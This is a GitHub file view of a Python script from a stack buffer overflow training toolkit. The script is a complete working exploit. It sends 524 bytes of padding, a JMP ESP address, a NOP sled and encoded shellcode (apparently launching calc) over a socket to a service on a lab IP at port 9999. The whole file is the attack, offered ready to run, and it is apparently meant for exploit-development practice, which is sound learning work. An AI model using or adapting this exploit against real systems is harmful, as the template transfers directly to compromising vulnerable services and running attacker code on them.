-
Notifications
You must be signed in to change notification settings - Fork 0
/
5-OpenCalc.py
53 lines (48 loc) · 1.79 KB
/
5-OpenCalc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/python3
#_*_ coding: utf8 _*_
import socket
"""
Project repository: https://github.com/JoshuaProvoste/Stack-Buffer-Overflow-Python-Toolkit
"""
buf = b""
buf += b"\xbf\x3f\x5c\x19\xba\xd9\xce\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0\x3b\xbe"
buf += b"\xec\x46\xab\xbc\x0f\xb7\x2b\xa1\x86\x52\x1a\xe1\xfd"
buf += b"\x17\x0c\xd1\x76\x75\xa0\x9a\xdb\x6e\x33\xee\xf3\x81"
buf += b"\xf4\x45\x22\xaf\x05\xf5\x16\xae\x85\x04\x4b\x10\xb4"
buf += b"\xc6\x9e\x51\xf1\x3b\x52\x03\xaa\x30\xc1\xb4\xdf\x0d"
buf += b"\xda\x3f\x93\x80\x5a\xa3\x63\xa2\x4b\x72\xf8\xfd\x4b"
buf += b"\x74\x2d\x76\xc2\x6e\x32\xb3\x9c\x05\x80\x4f\x1f\xcc"
buf += b"\xd9\xb0\x8c\x31\xd6\x42\xcc\x76\xd0\xbc\xbb\x8e\x23"
buf += b"\x40\xbc\x54\x5e\x9e\x49\x4f\xf8\x55\xe9\xab\xf9\xba"
buf += b"\x6c\x3f\xf5\x77\xfa\x67\x19\x89\x2f\x1c\x25\x02\xce"
buf += b"\xf3\xac\x50\xf5\xd7\xf5\x03\x94\x4e\x53\xe5\xa9\x91"
buf += b"\x3c\x5a\x0c\xd9\xd0\x8f\x3d\x80\xbe\x4e\xb3\xbe\x8c"
buf += b"\x51\xcb\xc0\xa0\x39\xfa\x4b\x2f\x3d\x03\x9e\x14\xa1"
buf += b"\xe1\x0b\x60\x4a\xbc\xd9\xc9\x17\x3f\x34\x0d\x2e\xbc"
buf += b"\xbd\xed\xd5\xdc\xb7\xe8\x92\x5a\x2b\x80\x8b\x0e\x4b"
buf += b"\x37\xab\x1a\x28\xd6\x3f\xc6\x81\x7d\xb8\x6d\xde"
xp = "192.168.21.140"
port = 9999
A = "\x41" * 524
jmp_esp = "\xF3\x12\x17\x31"
nops = "\x90" * 20
calc_payload = A + jmp_esp + nops + buf
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((xp,port))
sock.recv(1024)
sock.send(calc_payload)
except ConnectionRefusedError:
print("Connection error. Review the IP address or port.")
exit()
except socket.timeout:
sock.close()
print("\nConnection error. Timeout!")
except socket.error:
sock.close()
pass
except KeyboardInterrupt:
sock.close()
print("\n\nConnection closed. Bye!")
exit()